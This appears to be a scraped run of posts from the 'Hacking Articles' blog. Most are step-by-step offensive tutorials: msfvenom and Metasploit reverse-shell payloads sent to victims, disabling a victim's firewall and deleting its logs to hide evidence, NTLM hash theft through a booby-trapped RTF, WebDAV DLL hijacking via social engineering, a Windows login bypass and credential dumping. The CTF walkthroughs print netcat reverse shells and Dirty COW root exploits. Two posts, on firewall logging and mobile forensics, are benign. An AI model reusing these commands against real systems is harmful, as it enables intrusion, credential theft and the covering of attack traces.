Hacking Articles

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

LETS!!! START

Open the terminal in kali Linux and type following command to generate exe payload.

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe

Above command will create the raj.exe file on the Desktop now send this file to remote system for attack.

Load metasploit framework and type following command to start the attack.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpreter session.

meterpreter> sysinfo

Now let check the process ID of our payload.

meterpreter> ps

From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.

Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.

meterpreter> kill 4960

But!!! Still we have victim’s session which means raj.exe file migrate into new process ID.

meterpreter> sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hiding Shell with Prepend Migrate using Msfvenom appeared first on Hacking Articles.

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article you will learn how to manage multiple sessions of different targets in a network. Once you hacked more than one system in a network and received multiple meterepreter session in your Kali Linux then how will you retrieve data simultaneously from all targets.

LET’s PROCEED!!!

First an attacker needs to create a payload and share it in the network with his targets, then start multi handler in metasploit framework. Now when the available targets will open the payload in their system, the attacker will receive the series of sessions.

Here you can see from given screenshot I have receive two sessions from different system.

msf exploit(handler) > sessions

In order to gather the information from both targeted system simultaneously I had used post exploitation which let an attack to execute same command for multiple sessions at a time.

This module executes an arbitrary command line

msf exploit(handler) > use post/multi/general/execute

msf post(execute) > set command ipconfig

msf post(execute) > set session 1

msf post(execute) >exploit

In given screenshot you can see I have executed ipconfig to know the network configuration for session 1 and here the target IP is 192.168.0.100 as result.

Then in next step I just need to change session from 1 into 2 so that I can know network configuration for session 2 also and here the target IP is 192.168.0.105 as result.

msf post(execute) > set session 2

msf post(execute) >exploit

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Run OS Command against Multiple Session in Metasploit appeared first on Hacking Articles.

For any network administration it is very important that he should know how to check firewall logs in his network in order to maintain security of system. In this article you will learn more about firewall utility where we have try to describe how can any person check firewall log in his private network.

LETS START!!!

Let have a look where you will learn more about firewall security. Open windows firewall then select advance setting on the left side under control panel home.

Here we are at windows firewall advance setting; explore its property tab present on the right side of window’s frame.

Now you can see the local computer property dialog box has been opened, here select the private profile option.

Here another dialog box will get appear in front of you to configure private profile for firewall.

Only we need to manipulate two things in this profile without disturbing other settings. Change “NO (default)” into “YES” for log dropped packets and log successful connection as shown in given screenshot. At last click on OK.

Now again we are at advance security setting of firewall here bring your cursor down toward monitoring option. From screenshot you can see window frame for firewall monitoring where it contains general and logging setting. As we want to read firewall logs therefore now click on the blue link given as file name under logging setting.

GREAT!!! Finally we can read firewall log and can investigate firewall traffic in our network.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Enable and Monitor Firewall Log in Windows PC appeared first on Hacking Articles.

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.

First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall

Type dir to observe the present directory of firewall.

Dir

From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.

type pfirewall.log

So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.

To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.

Netsh firewall set opmode mode= DISABLE

Now type given below command to delete pfirewall.log

Del pfirewall.log

Now type given below command to verify pfirewall.log is still available or not in victim’s PC

type pfirewall.log

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Delete Firewall Log in Remote PC using Metasploit appeared first on Hacking Articles.

Today in this article we’ll try to compromise the target through VNC payload attack using very simple method for beginners. In this tutorial they’ll learn how to create a VNC payload using set tool kit and try to achieve VNC shell of victim’s PC.

Let’s Start!!!

Application > social engineering toolkit

A terminal will launch with set tool kit wizard here select first option to start social engineering attacks.

Type 1

Now we have to select another option to choose any one attack among following. Select create a payload and listener.

Type 4

Here we will select our payload option since we are performing VNC attack therefore we need to go with third option for VNC payload.

Type 3

In next step it requires IP address for payload listener which is 192.168.0.104 (attacker’s IP) then after that it will ask to enter the port for reverse listener and that will be 4444.

Now it starts generating VNC payload and save that payload under heighted path. Explore /root./set//payload.exe and send payload.exe to target.

Further it will ask to start payload listener type Y and hit enter which will start loading metasploit framework.

Here it launches metasploit framework and start multi handler automatically; now once the victim click on payload.exe file sent by attacker, attacker will get victim’s VNC shell.

Wonderful!!!

Our VNC attack using set toolkit is successful and we received victim’s VNC shell on our system.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Capture VNC Session of Remote PC using SetToolkit appeared first on Hacking Articles.

Drive Droid is an Android application that allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go… without the need to burn different CDs or USB pen drives.

Drive Droid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone. You can also create USB-images which allow you to have a blank USB-drive where you can store files in. Blank images also allow you to use tools on your PC to burn images to the drive and create a bootable USB disk that way.

You can manually download it from google playstore.

Note: need root privilegde means you need rooted phone.

Let’s start!!!

Install DriveDroid app on your smartphone and run the application.

Click on plus sign at the lower right corner to add any iso image file.

Under preference here we need to select image directories so that we can browse konboot iso image file.

Further it will move into internal storage to let you choose your iso file, I have opt for konboot.iso and click on select (Please note that the kon-bootCD.iso file should exist on your phone)

Selected the koonboot iso file and it will get mounted

Tap on the mounted file and we can see three boot options as shown in the figure below Select the third option of CD-ROM and connect the smart phone with the system and reboot the system

Now plug the USB cable between phone and system for booting it from your phone and restart the system (pc) then continuously press function key of your desktop system.

Select the smartphone as the boot device from the bios boot menu of the system and system will boot with koonboot.

Great!!! Successfully you will get administration console; now hit the enter button on the key board. This will bypass the admin console without entering password.

The post Bypass Windows Login Password using Android Phone with DriveDroid appeared first on Hacking Articles.

Once again we are with the vulnhub labs tutorial; this article is related to CTF lab where you will face three challenges to complete the task. This lab is pretty good for beginner as they have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box. You can download it from here.

LET’S BEGIN!!!

Now scan particular IP with version scan using Nmap tool as given in the image.

nmap -sV 192.168.0.122

Here it point up the open ports and running services on it. As shown port 22, 53, 80, 445 and etc. are open.

Since port 80 is open therefore let explore target IP: 192.168.1.122 on the browser. From screenshot you can see I have not got any remarkable thing from here.

Later I had used nikto for complete scan and here you can see it has shown robots.txt contains two entries from the highlighted text in the given screenshot.

Again I move towards browser to explore roborts.txt here I found wordpress as one of the entry in it.

Further I look around following path: 192.168.0.122/wordpress in browser where I found a wordpress administrator console.

To breach administrator console of the wordpress we can use WPscan tool; now type following command to start wpsan enumeration.

wpscan –url http://192.168.0.122/wordpress/ –enumerate u

At last I have received two users name from it scanning result, now use admin credential for login inside the wordpress.

Accordingly under admin console we can upload any theme, taking advantage of admin’s right we will try to upload malicious script to achieve reverse connection from victim’s system. Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.122 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *<?php……….die(); further we will past it inside wordpress template as a new theme.

Now past above copied PHP text *<?php……….die(); here as new theme under selected 404.php template.

On other hand Load metasploit framework and start multi/handler

When you will execute your uploaded theme in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.

Here form screenshot you can see through meterpreter we have access victim’s shell.

Meterpreter> sysinfo

Meterpreter>shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Hence our first task is completed!!

Now type following command to obtain flag:-

cd /home

cd wpadmin

cat flag.txt

2bafe61f03117ac66a73c3c514de796e (1st flag)

Now dig up more to achieve next flag so that we can complete second challenge also.

cd www

cd wordpress

cat wp-config.php

Wp-config.php file helps me in achieving second task of this lab this file contains MYSQL Setting where I found credential for user root. If you will notice given below screenshot you can also read the username as well as its password (root: rootpassword)

Now try to login for root privilege by typing following

rootpassword

Great!!! We have completed second challenge also.

cd root

cat flaf.txt

8e3f9ec016e3598c5eec11fd3d73f6fb (2^nd flag)

After many efforts I enrolled in etc where I found one more directory cron.d then I penetrate more inside and luckily capture third flag also and beat all three challenges.

cd cron.d

cat php5

d46795f84148fd338603d0d6a9dbf8de (3rd flag)

Boo-yah! We have successfully captured all 3 flags.

Rajat Chikara is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India.

The post Hack the Quaoar VM (CTF Challenge) appeared first on Hacking Articles.

Today we are going to solve another vunhub’s lab challenges “SEDNA” which contains 4 flags on this machine One for a shell, One for root access and Two for doing post exploitation on Sedna. For doing practice you can download it from here.

Let’s start!!!

Scan particular IP with version scan using Nmap tool as given in the image.

nmap -sV 192.168.0.113

Here it point up the open ports and running services on it. As shown port 22, 53, 80 and etc. are open.

Since port 80 is open therefore let explore target IP: 192.168.0.113 on the browser. From screenshot you can see I have not got any significant thing from here.

Shortly I had used nikto for entire scan and here you can see it has revealed license.txt from the highlighted text in the given screenshot.

Again I move towards browser to look at license.txt here I found the name of software “BUILDERENGINE” which might be used in this machine.

Then I enrolled into Google in hope to seek any exploit related to this software.

Luckily! the first link of the web page took me in the right direction here I found builder “engine 3.5.0 arbitrary file upload Exploit DB”.

When you will open this link you’ll notice an html code as shown in the given below screenshot. Copy this html code (<html>….. </html>) and past it inside a text file.

Now inside your text file replace localhost from target IP http:// 192.168.0.113 and save with .html extension, I have saved it as file.html.

Above html code will create a form for file uploading; now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *<?php……….die()inside the text document then save it with .php extension, here I have saved it with shell.php after that load metasploit framework and start multi/handler for reverse connection.

Next I will upload my shell.php file on target machine and to perform this we need to open file.html file where it will permit you to browse shell.php after that once you have select your file for uploading click on send button.

Great!!! Our backdoor has uploaded successfully and from next screenshot you can observe I have obtained the path where my shell.php has been uploaded.

Now let’s dig up above highlighted path in the browser 192.168.0.113/file; so here again you can observe shell.php under index of files. When you will click on shell.php file you will get meterpreter session at the background of metasploit framework.

NICE!!! We have got victim’s meterpreter session; now time to capture the flags.

Meterpreter> cd/var/www

Meterpreter>ls

Meterpreter>cat flag.txt

Here we have got 1^st flag successfully!

Now turn into another directory to find our next flag.

Meterpreter>cd/etc

Meterpreter> cd chkrootkit

Meterpreter>ls

Meterpreter>cat README

Under README file I came to know its version i.e. chkrootkit V.0.49

When I investigate more related to this then I found an exploit inside the metasploit.

Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.

Use exploit/unix/local/chkrootkit

Msf exploit (chkrootkit)>options

Msf exploit (chkrootkit)>set session1

Msf exploit (chkrootkit)>exploit

Here we have got command shell session victim with root privilege

Msf exploit (chkrootkit)>set session –I 2

Cat flag.txt

Awesome!!! We have captured 2^nd flag also.

Now try to find out flag 3^rd and 4^th yourself to complete this task. GOOD LUCK!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Sedna VM (CTF Challenge) appeared first on Hacking Articles.

Coming towards another tutorial of vulnhub’s lab challenges “pluck” you can download it from here.

This lab is quite simple this article may help you to solve the task for capturing the flag.

LET’S START!!!

192.168.1.115 is my target IP let enumerate through aggressive scan using NMAP. You can observe its result from given screenshot.

nmap -p- -A 192.168.1.115

Use nikto to dig up more information related to target

nikto -h http://192.168.1.115

Finally I have got something very remarkable here if you notice the given below image the highlighted text looks like local file inclusion vulnerability.

So when I explore the above highlighted text in the browser here I got more than enough data. The highlighted text denotes towards some kind of backup script file path.

http://192.168.1.115/index.php?page=../../../../../../../../etc/passwd

When again I walk around it now further I found a tar file for backup.

http://192.168.1.115/index.php?page=/usr/local/scripts/backup.sh

Download tar file of backup script, type following command inside the terminal of your kali Linux.

Wget http://192.168.1.115/index.php?page=/backups/backup.tar

Now type following command to extract backup.tar file

Tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar

Inside it I found home folder which further contains sub folder for 3 users.

Among all 3 users only paul has keys

cd paul

cd keys

So here I found 6 keys, let use one of them for connection.

Ssh -I id_key4 paul@192.168.1.115

When you will try to connect with target using ssh simultaneously a new terminal “Pdmenu” will pop up. Here I got so many option but I choose Edit file option that gave me a prompt to edit any file and it look like command injection vulnerability.

Now load metasploit framework and type following

Msfconsole

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>set lhost 192.168.1.15 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set svrport 8081

msf exploit (web_delivery)>exploit

Now copy the generated command php….5tz’));” and send it to target

Now paste above command as shown in the screenshot and hit enter which will give you reverse connection at the background inside metasploit.

Great!!! We have got victim’s meterpreter session

Meterpreter>shell

Uname -a

Now use Dirtycow exploit

Here got the path to download exploit which might be related to it.

Open this path “http://www.exploit-db.com/download/40616” in browser and downloads the exploit for dirty cow vulnerability. I have saved this exploit as raj.

Now type following command to compile your exploit so that it can run successfully inside your Kali Linux.

gcc shell.c –o raj -pthread

Now we can run our exploit to achieve root permission and try to capture the flag

./raj

cd /root

Cat flag.txt

Bravo!!! We have captured the flag an beat this task………..

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Pluck VM (CTF Challenge) appeared first on Hacking Articles.

Hello! Today you will found something incredible in this article which is related to a newly lunched script named as “WORD STEAL” that can define your hacking skill more and more. This script will create a POC that will steal NTML hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to a SMB server and the victim will authenticate with his logins credentials. This is very useful during a Pentest because allows you to steal credentials without triggering any alerts and most of the security apps do not detect this.

LET’s Broach!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007)

First we need to download it from Git hub, open the terminal in your Kali Linux and type following command.

Git clone https://github.com/0x090x0/WordSteal.git

Now open the downloaded folder word steal where you will get a python script “main.py” give all permissions to main.py script if required.

Chmod 777 main.py

As author has described that this script will convert an image or say .jpg into .rtf (Microsoft word file) The Rich Text Format is a proprietary document file format with published specification developed by Microsoft Corporation for cross-platform document interchange with Microsoft products.

After then download an image and save it inside Wordsteal folder, since I have an image “1.jpg” at this moment we require to type following command which generates .rtf file that steal NTML hashes from a remote computer.

Python main.py 192.168.0.104 1.jpeg 1

Above command will generate .rtf file as you can figure out this in the given screenshot, after then send 1.rtf file to remote PC.

When victim will open 1.rtf (as Microsoft word file) in his system, on other hand attack will receive NTML hashes.

Inside word steal we have stolen credentials without triggering any alerts which you can observe in following image.

Now use password cracker tool john the ripper to crack hashes in password_netntlmv2 file or type following command

John password_netntlmv2

Cool!!! We can see victim’s credential clearly RAJ: 123 that might be further use for login.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Stealing Windows Credentials of Remote PC with MS Office Document appeared first on Hacking Articles.

The manifold increase in the mobile penetration amongst the world population has interested people from all works of life namely mobile manufactures, service providers, application developers and more to this industry. Thequantum jump inthe user base and its usage of mobile has even caught the eye of Forensic Experts.

In this article we will conduct a mobile investigation of ONE Plus mobile model by applying Cellebrite UFED software.

As a preliminary process, adjustments need to be undertaken on the mobile model under surveillance. The investigator attaches the mobile to his/her laptop through the phone cable.The investigator needs to open the ‘About Phone’ section under Setting and scroll down the various options till he reaches the ‘Build Option’, he needs to tap the ‘Build Option’ seven (7) times which opens a new section – the ‘Developer Option’. Before commencing Cellebrite software, the investigator must check whether the mobile commands ‘Stay Awake’ and Debugging (USB debugging) are ON.

After completing the following steps, the investigator inserts the licensed Cellebrite USB Key in the laptop which displays five choices namely- Mobile device, SIM Card, USB device or Memory Card, UFED Camera and Device Tool.

We choose ONE Plus mobile model to demonstrate the Cellebrite software. After configuration the software on the laptop, the software displayed seven ONE Plus models to select our model.

Since our mobile is ONE Plus 3 A3003 model, we put it for the forensic investigation. In order to gather information, the Cellebrite software provided us with five ‘Extraction’ choices ranging from Logical Extraction, File System Extraction, Physical Extraction (Root), Capture Images, Capture Screen Shots which are easy to understand and implement.

It is recommended that the investigator must click on Logical Extraction followed by Physical Extraction to gather information.

For our demonstration, we selected the Logical Extraction and selected three types of information from the Phone Memory likePhone (Phone Book), SIM (Phone Book) and Phone (Content) and press Next.

The Logical Extraction gave a further choice to select the type of information from the Phone Memory namely Contacts, SMS, MMS, Calendar, Apps Data, Pictures, Audio/Music, Videos, Ringtones and Call Logs.

The software sends a ‘pop up’ message and in order to move further the investigator needs to click on YES.

From the Contacts account we extracted contacts from Gmail, Face book messenger and Whatsapp as displayed below.

The Cellebrite software provides the investigator with source instructions to proceed further on the case by just clicking on the ‘How to?’

The Logical Phone Extraction was completed successfully. The details of the number of information gathered from Phonebook, SMS, and Call Logs from the mobile under forensic investigation is highlighted.

The software displays another pop up ‘PA Evidence Collection.ufdx’ along with the Logical 01 folder for the investigator

The UFED Physical Analyzer report of the mobile phone was captured by Cellebrite. The analyser captured content of the mobile model information ranging from the model name, IMEI, ICCID, MSISDN, IMSI to name a few.

Before making the final report, a case management form needs to be filled up by the investigator which provides –the case number, name, evidence number, examiner name, department, location, notes, name of the report, document details, project name as well as format. The report will be submitted in PDF or word or any other format. The final report is generated by pressing Next command.

Summary of the Cellebrite UFED report on mobile under forensic investigation.

Abhinav Tiwari is An Ethical Hacker, Cyber F0rensics Expert, Penetration Tester, India.contact here

The post Mobile Forensics Investigation using Cellebrite UFED appeared first on Hacking Articles.

Top HatSec built a VM image “Fart knocker” and kept the challenge to capture the flag in his machine. This VM box is mainly design for testing your network penetration skills, before solving this challenge you must know about network packet analysis and port knocking.

Let’s begin!

Scan your network using netdiscover command I found an IP address 192.168.1.25 in my network.

Enumerate the target through aggressive scan; type following command for nmap scanning:

nmap -p- A 192.168.1.25

So here I found only single port 80 is open

Since port 80 is open I look toward browser and explore target ip 192.168.1.25, here I got a Link “Woah” without wasting time I just clicked on it.

Link Woah contains a pcap1.pcap file; I download it to find out some clue.

This file open with wireshark here I distinguish that VM box trying to connect over TCP ports 7000, 8000, and 9000. Behind the machine efforts on those 3 ports it gets discarded and some obstructed attempts on a connection RST, ACK; when I dig out more I found this technique is known as port knocking.

Port 7000 is used for connection but rejected.

Port 8000 is used for connection but rejected.

Port 9000 is used for connection but rejected.

Now send packets to 7000, 8000, 9000 so that these ports sequence will open another port. Therefore type following command for nmap to perform a Sequential Port Scan.

Nmap –r –p 7000, 8000, 9000 192.168.1.25

Once again scan target machine using aggressive scan.

Nmap –p- A 192.168.1.25

Great! Here we can see 8888 is open now and from screenshot you read a new directory /burgerworld/

Then I run towards browser to explore 192.168.1.25/burgerworld/ this time again I found another link heheh..hehh that contains one more pcap file again I download that pcap2.pcap file.

Now the game is very clear Top HatSec had involve port knowing at each step, again I opened pcap2 file with wireshark but this time I didn’t found any port knocking sequence therefore I randomly select a packet to follow it TCP stream. Here you can select any packet make right click on it and choose follow option.

TCP stream captured the following image point towards another clue through CAN YOU UNDERSTAND MY MESSAGE!

Hush! His message was in German language!

When I translate it I got one three three seven. This port 1337 could be another knocking port.

Again type following command for nmap to perform a Sequential Port Scan.

Nmap –r –p 1337 192.168.1.25

Oooh!!! It is showing waste service means perform a Sequential Port Scan fail to knock 1337.

Use another way “netcat” to knock port 1337:

Nc –nv 192.168.1.25 1337

But connection refused now try single port number.

Nc –nv 192.168.1.25 1

Nc –nv 192.168.1.25 3

Nc –nv 192.168.1.25 7

Finally port 1337 get opened which points towards /iamcornholio/

Explore 192.168.1.25/iamcornholio/

This time I found a base 64 encode string which should to be decoded so that we can move forward.

I took the help of burp suite to decode this string “T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK” and what I found was quite interesting.

Open up SSH: 8888 9999 7777 6666

Again Use “netcat” to knock following port:

Nc –nv 192.168.1.25 8888

Nc –nv 192.168.1.25 9999

Nc –nv 192.168.1.25 7777

Nc –nv 192.168.1.25 6666

From screenshot you can I have use version scan for target.

Nmap –SV 192.168.1.25

Awesome port 22 is opened for SSH

Now try to connect with target through ssh –l butthead 192.168.1.25 /bin/bash

Here I got successfully login now type following command

uname –a

I Found kernel version 3.13.0 now let’s find out whether there is any exploit related to its present or not.

With the help of Google I found an exploit from screenshot you can see the link for “ofs 32” click on it to download this exploit that allow a local user to take administration privilege.

Now type following command to download ofs 32 inside victim’s system and then achieve root privileges to capture the flag.

Wget https://www.kernel-exploit.com/media/ofs_32

./ofs_32

Cd /root

Cat secretz

SECRET = “LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK”

!!This was very curies and most challenging machine!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Fartknocker VM (CTF Challenge) appeared first on Hacking Articles.

Hi friends! Today we are going to face Bot challenge in new VM machine of vulnhub design by Mr. Brian Wallace. In this tutorial you will how to access root privilege by generating malicious bot. you can download this challenge from here.

Let’s start!!!

Open the terminal of Klai Linux to Identify the target in your network using netdiscover command.

Netdiscover

From screenshot you can see the highlighted target IP : 192.168.1.105

Enumerate open port of targeted IP using nmap therefore type following command:

nmap -p- -Pn 192.168.1.105

From its scanning result we come to know that port 22, 80, 111, 55844 are open ports.

Seeing as port 80 is open I come across towards browser and look at target IP 192.168.1.105. Here the web page was pointing out towards two more different links “Panel” and “Dexter Analysis for a different botnet”.

When I visit to second link it was redirected to another web site and I found this link is not for our use but when I click on “panel” this linked me to a login page.

So now I was at login page and I have no idea for its username: password here I also try sql login form injection but couldn’t breach this login page.

Now next I choose dirbuster for directory brute force attack to step forward in expectation to get some directories inside it.

From screenshot you can perceive the files and directories which I found through brute force attack. Next we need to explore these directories in browser so that we can find our any clue to breach login page.

I start with upload.php where we can upload our malicious file or backdoor as you can see from screenshot I try to upload hacked.php file but nothing happened. Then I try to explore another directory but unable to find any clue regarding this task.

When I investigate more, then after wasting much I found apart from all directories only gateway.php was suffering from blind SQL injection vulnerable but here the post parameter was encoded with base 64.

Now attacker has two options either configure sqlmap to retrieve credential or download relevant exploit Dexter Casino Loader SQL Injection given by Brian Wallace. I had use this exploit to find out login credential. You can download it from here.

Once you have downloaded it then type following command in terminal:

Python 31686.py dump http://192.168.1.106/Panel/gateway.php

Now you will get login credential for bot panel.

Then I typed above fetched username and password into login form.

The panel has three basic features; bot control, dump viewer, and file upload. Without wasting time I click on upload options.

Now again I will try to upload php backdoor so that we get reverse connection of target system.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will past it inside text document and saved with shell.php and multi handler inside metasploit.

Now go back to upload directory and upload shell.php now you can see from given image the shell.php file is successfully upload inside /panel/exes.

Here we are going to execute shell.php which gives reverse connection in metasploit framework.

192.168.1.105/panel/exes

Awesome! We have victim’s metrepreter session

Metrepreter > ls

Metrepreter > cd var/www

Metrepreter > ls

Inside /var/www I found my bot file antitamper.list, now first we will download it

Metrepreter >download antitamper.list /root/Desktop

Here you can read the downloaded file then add you malicious bot inside it

Now I have add my malicious bot then upload it again inside /var/www and start netcat for reverse connection then run antitamper.py

“shell”: “‘; /bin/nc -e /bin/sh 192.168.1.104 4444 #”,

Nc –nlvp 4444

Hurray!!! We have got root connection.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Bot challenge: Dexter (Boot2Root Challenge) appeared first on Hacking Articles.

Today we are going to solve Wallaby’s Nightmare CTF which is a new VM challenge of vulnhub where attacker has to achieve root flag of the targeted VM machine; you can download it from here.

LET’S BEGIN!

As we always start from network so that we can have target IP. In your kali Linux open the terminal and type netdiscover, now from screenshot you can see list of IP. Here 192.168.0.101 is my target IP.

Enumerate the target through aggressive scan; type following command for nmap scanning:

nmap -p- A 192.168.0.101

So here I found three ports 22, 80, 6667 are open.

Since port 80 is open I look toward browser and explore target ip 192.168.0.101 where I found a comment “enter a username to get started with this CTF” then I type the name “RAJ” and click on submit so that we could move forward into start the game.

When I clicked on submit tab it linked to next web page where you can read the assign username for this CTF from screenshot now we can start this CTF when we will click on given link start the CTF!

Next web page open with exclusive warning that Mr. Wallaby found raj is trying to penetrate inside the server so user “raj” is under his observation. Then soon after reading this threat I observe at its URL I thought it might be vulnerable to etc/passwd same as LFI attack.

Then I try browse following in URL 192.168.1.101/?page=/etc/passwd though the web page stand up with raw data but nothing was quite useful in this web page. And when I refresh it I lose connection from port 80. As raj was threaten by Wallaby

Again I move toward nmap so that I can make sure about port 80 but here I found a new port 60080 is open for http service as you can perceive this thing from given screenshot.

Then I next my next tool dirb

Dirb http://192.168.0.101:60080/?page=

Now from screenshot you can see the result and currently we will look toward highlighted directory.

So when I browse 192.168.0.101:60080/?page=mailer in URL the resultant web page gets opened and I found nothing especial here except “coming soon guys!”

Then I look after page source code to get some clue, here inside HTML code the anchor tag contains a link for another file which you can see from screenshot.

Again I browse above highlighted text 192.168.0.101:60080/?mailer&mail=pwd in URL and the web page comes outside with /var/www/html

Hence we can say that the current page might good for executing malicious comment as command.

Now load metasploit framework to connect with victim through reverse connection

Msfconsole

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>exploit

Now copy the generated command php….UvrG’));” and send it to target

From screenshot you can see I have paste above malicious PHP comment inside url in hope to get reverse connection inside metasploit.

So when I execute this comment I receive meterpreter session and get connected with victim shell

Meterpreter> sysinfo

Meterpreter>shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /tmp

Now use “Dirtycow exploit” therefore type following command to download this exploit inside tmp folder of victim.

Wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

Now type following command to compile your exploit so that it can run successfully inside.

gcc cowroot.c –o cowroot -pthread

Now we can run our exploit to achieve root permission and try to capture the flag

./cowroot

cd /root

Cat flag.txt

Congratulation!!! We have captured the flag which you can see from screenshot and beat this task………..

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Nightmare VM (CTF Challenge) appeared first on Hacking Articles.

Hello friends! Through this article we are introducing a new tool MINIPENUIN between us, which can utilize for fetching login of Linux system in same way as MIMIKATZ.

A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Takes advantage of clear text credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word’s probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.

Let’s begin

Open the terminal and type following command to download it from git hub.

Cd Desktop

git clone https://github.com/huntergregal/mimipenguin.git

cd mimipenguin

Now run the bash file to catch the clear text credential

./mimipenguin.sh

From screenshot you can see I have got login credential root: toor.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Dump Cleartext Password in Linux PC using MimiPenguin appeared first on Hacking Articles.

Through this article, you will learn WebDAV application DLL hijacking exploitation using Metasploit framework and try to hack the victim through malicious code execution.

Attacker: Kali Linux

Target: Window 7 (torrent)

Let’s start!!!

Open the terminal and type msfconsole to load metasploit framework.

This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.

use exploit/windows/browser/webdav_dll_hijacker

msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp

msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107

msf exploit(webdav_dll_hijacker) >set extensions torrent

msf exploit(webdav_dll_hijacker) >exploit

It has generate a malicious code which you can perceive from screenshot the highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.

Once you have shared malicious code link to the client then must for your meterpreter session, now when client will open the link he will be intended to a document folder with many file extensions and attacker will receive his meterpreter session.

Hence meterpreter session 1 opened successfully now we are connected with target through port 4444.

msf exploit(webdav_dll_hijacker) >sessions 1

meterpreter> sysinfo

